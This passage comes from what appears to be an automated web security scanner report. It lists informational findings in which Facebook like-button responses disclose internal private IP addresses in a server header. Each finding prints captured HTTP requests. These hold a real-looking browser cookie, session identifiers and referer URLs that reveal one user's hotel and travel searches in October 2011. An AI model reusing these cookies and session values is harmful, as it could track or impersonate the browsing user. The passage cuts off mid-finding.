Date: Mon, 03 Oct 2011 00:11:02 GMT
Content-Length: 31012

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...

23.88. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response (X-FB-Server header): 10.64.227.49

Request

GET /plugins/like.php?channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df133b4b3cc%26origin%3Dhttp%253A%252F%252Fwww.orbitz.com%252Ff115b08374%26relation%3Dparent.parent%26transport%3Dpostmessage&extended_social_context=false&href=http%3A%2F%2Fwww.facebook.com%2FOrbitz&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=90 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.orbitz.com/shop/hotelsearch?type=hotel&hotel.keyword.key=Boston%2CUnited%20States&hotel.rooms[0].adlts=1&hotel.type=keyword&hotel.chkin=10/04/11&hotel.chkout=10/07/11&search=Search&WT.mc_ev=click&WT.mc_id=o_igo_merch_city_dated&gcid=C11287x600-CYBoston,United%20States&lpid=plhot
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.227.49
X-Cnection: close
Date: Mon, 03 Oct 2011 00:10:27 GMT
Content-Length: 26104

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...

23.89. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response (X-FB-Server header): 10.54.188.41

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.facebook.com%2Fhotelplanner&layout=button_count&show_faces=false&width=46&action=like&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.188.41
X-Cnection: close
Date: Mon, 03 Oct 2011 00:28:34 GMT
Content-Length: 23446

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...

23.90. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response (X-FB-Server header): 10.54.200.64

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.cmegroup.com%2Fadvance%2F&layout=button_count&show_faces=false&width=90&action=like&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.cmegroup.com/advance/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.200.64
X-Cnection: close
Date: Mon, 03 Oct 2011 00:26:45 GMT
Content-Length: 23287

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...

23.91. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response (X-FB-Server header): 10.27.94.107

Request

GET /plugins/like.php?channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3a5122968%26origin%3Dhttp%253A%252F%252Fwww.hotelplanner.com%252Ff188f86a78%26relation%3Dparent.parent%26transport%3Dpostmessage&extended_social_context=false&href=www.facebook.com%2Fhotelplanner&layout=button_count&locale=en_US&node_type=link&sdk=joey&send=true&show_faces=false&width=150 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Search/Index.cfm?City=+&InDate=10/09/2011&OutDate=10/16/2011&NumRooms=1&sc=Away
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.27.94.107
X-Cnection: close
Date: Mon, 03 Oct 2011 00:37:45 GMT
Content-Length: 30957

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...

23.92. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response (X-FB-Server header): 10.54.197.35

Request

GET /plugins/like.php?api_key=158327657537972&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfc165e08c%26origin%3Dhttp%253A%252F%252Fwww.hotels.com%252Ff2f34f73a%26relation%3Dparent.parent%26transport%3Dpostmessage&extended_social_context=false&href=www.hotels.com%2Fho109368%2Fboston-omni-parker-house-hotel-boston-united-states%2F&layout=button_count&locale=en_US&node_type=link&sdk=joey&send=true&show_faces=false&width=160 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotels.com/hotel/details.html?pa=1&pn=1&ps=1&tab=description&destinationId=1643195&hotelId=109368&arrivalDate=10-04-11&departureDate=10-07-11&rooms[0].numberOfAdults=2&roomno=1&validate=false&previousDateful=false&reviewOrder=date_newest_first
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.197.35
X-Cnection: close
Date: Mon, 03 Oct 2011 00:29:28 GMT
Content-Length: 31301

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...

23.93. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response (X-FB-Server header): 10.54.181.32

Request

GET /plugins/like.php?channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2ba4bfa1%26origin%3Dhttp%253A%252F%252Fwww.hotelplanner.com%252Ff2fa01307%26relation%3Dparent.parent%26transport%3Dpostmessage&extended_social_context=false&href=www.facebook.com%2Fhotelplanner&layout=button_count&locale=en_US&node_type=link&sdk=joey&send=true&show_faces=false&width=150 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.181.32
X-Cnection: close
Date: Mon, 03 Oct 2011 00:28:37 GMT
Content-Length: 31004

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...

23.94. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response (X-FB-Server header): 10.62.132.38

Request

GET /plugins/like.php?channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1fc75419c%26origin%3Dhttp%253A%252F%252Fwww.orbitz.com%252Ffcc6369f4%26relation%3Dparent.parent%26transport%3Dpostmessage&extended_social_context=false&href=http%3A%2F%2Fwww.facebook.com%2FOrbitz&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=90 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.orbitz.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.132.38
X-Cnection: close
Date: Mon, 03 Oct 2011 00:07:25 GMT
Content-Length: 25790

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...

23.95. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response (X-FB-Server header): 10.64.128.42

Request

GET /plugins/like.php?href=www.facebook.com/bookingcom&layout=button_count&show_faces=false&font=arial&action=like&colorscheme=light&locale=en_US&ref=socnet_fb_og_h HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.booking.com/hotel/us/copley-square.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;checkin=2011-10-04;checkout=2011-10-07;srfid=d7dea8120903ba76c86df3f7d5812996X1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.128.42
X-Cnection: close
Date: Mon, 03 Oct 2011 00:14:33 GMT
Content-Length: 23587

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...

23.96. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response (X-FB-Server header): 10.27.217.102

Request

GET /plugins/like.php?channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1c445b22c%26origin%3Dhttp%253A%252F%252Fwww.orbitz.com%252Ff11f1d4304%26relation%3Dparent.parent%26transport%3Dpostmessage&extended_social_context=false&href=http%3A%2F%2Fwww.facebook.com%2FOrbitz&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=90 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.orbitz.com/App/ViewFlightSearchResults?retrieveParams=true&z=115e&r=84x&z=115f&r=84y&lastPage=interstitial
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.27.217.102
X-Cnection: close
Date: Mon, 03 Oct 2011 00:37:26 GMT
Content-Length: 25874

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...

23.97. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response (X-FB-Server header): 10.54.210.60

Request

GET /plugins/like.php?channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3612be91c%26origin%3Dhttp%253A%252F%252Fwww.orbitz.com%252Ff3aab797f%26relation%3Dparent.parent%26transport%3Dpostmessage&extended_social_context=false&href=http%3A%2F%2Fwww.orbitz.com%2Fhotels%2Fh10417%2F&layout=button_count&locale=en_US&node_type=link&sdk=joey&send=true&show_faces=false&width=200 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.orbitz.com/shop/hotelsearch?type=hotel&hotel.keyword.key=Boston%2CUnited%20States&hotel.rooms[0].adlts=1&hotel.type=keyword&hotel.chkin=10/04/11&hotel.chkout=10/07/11&search=Search&WT.mc_ev=click&WT.mc_id=o_igo_merch_city_dated&gcid=C11287x600-CYBoston,United%20States&lpid=plhot&hsv.showDetails=true&hotel.hid=10417&hotel.hkey=10417_null_null_null_A1:0
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.210.60
X-Cnection: close
Date: Mon, 03 Oct 2011 00:27:24 GMT
Content-Length: 30328

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...

23.98. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response (X-FB-Server header): 10.54.210.39

Request

GET /plugins/like.php?api_key=158327657537972&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df681ba31%26origin%3Dhttp%253A%252F%252Fwww.hotels.com%252Ff2f34f73a%26relation%3Dparent.parent%26transport%3Dpostmessage&extended_social_context=false&href=www.hotels.com%2Fho109368%2Fboston-omni-parker-house-hotel-boston-united-states%2F&layout=button_count&locale=en_US&node_type=link&sdk=joey&send=true&show_faces=false&width=160 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotels.com/hotel/details.html?pa=1&pn=1&ps=1&tab=description&destinationId=1643195&hotelId=109368&arrivalDate=10-04-11&departureDate=10-07-11&rooms[0].numberOfAdults=2&roomno=1&validate=false&previousDateful=false&reviewOrder=date_newest_first
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.210.39
X-Cnection: close
Date: Mon, 03 Oct 2011 00:28:26 GMT
Content-Length: 31298

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...

23.99. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response (X-FB-Server header): 10.43.146.33

Request

GET /plugins/like.php?channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfc164f6f4%26origin%3Dhttp%253A%252F%252Fwww.orbitz.com%252Ff9d35ebc4%26relation%3Dparent.parent%26transport%3Dpostmessage&extended_social_context=false&href=http%3A%2F%2Fwww.facebook.com%2FOrbitz&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=90 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.orbitz.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.146.33
X-Cnection: close
Date: Mon, 03 Oct 2011 00:33:56 GMT
Content-Length: 25789

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...

23.100. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response (X-FB-Server header): 10.64.168.53

Request

GET /plugins/like.php?href=www.facebook.com%2Fexpedia&layout=button_count&show_faces=false&width=90&action=like&colorscheme=light&height=21&ref=header HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.expedia.com/Boston-Hotels-The-Boston-Park-Plaza-Hotel-Towers.h4215.Hotel-Information?chkin=10%2F04%2F2011&chkout=10%2F07%2F2011&rm1=a1&hwrqCacheKey=ccf4a420-af8b-480f-8413-efb42e880287HWRQ&hashTag=roomsAndRates&rfrr=-5517&c=d20f4232-e339-420a-bcb4-97cad88f9b0f&&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.168.53
X-Cnection: close
Date: Mon, 03 Oct 2011 00:13:38 GMT
Content-Length: 23546

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...

23.101. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response (X-FB-Server header): 10.62.84.44

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.booking.com%2Fhotel%2Fus%2Fc-boston-massachusettes.html&layout=standard&show_faces=false&font=arial&action=like&colorscheme=light&locale=en_US&ref=socnet_fb_og_h HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.booking.com/hotel/us/c-boston-massachusettes.html?aid=323804&label=hotel-59554&utm_source=tripad&utm_medium=SPPC&utm_content=text-cr&utm_term=hotel-59554&do_availability_check=on&checkin_monthday=14&checkin_year_month=2011-10&checkout_monthday=16&checkout_year_month=2011-10&lang=en
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS; lsd=xyVNA

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.84.44
X-Cnection: close
Date: Mon, 03 Oct 2011 01:02:37 GMT
Content-Length: 26364

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...

23.102. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response: 10.43.155.75 (in the X-FB-Server response header)

Request

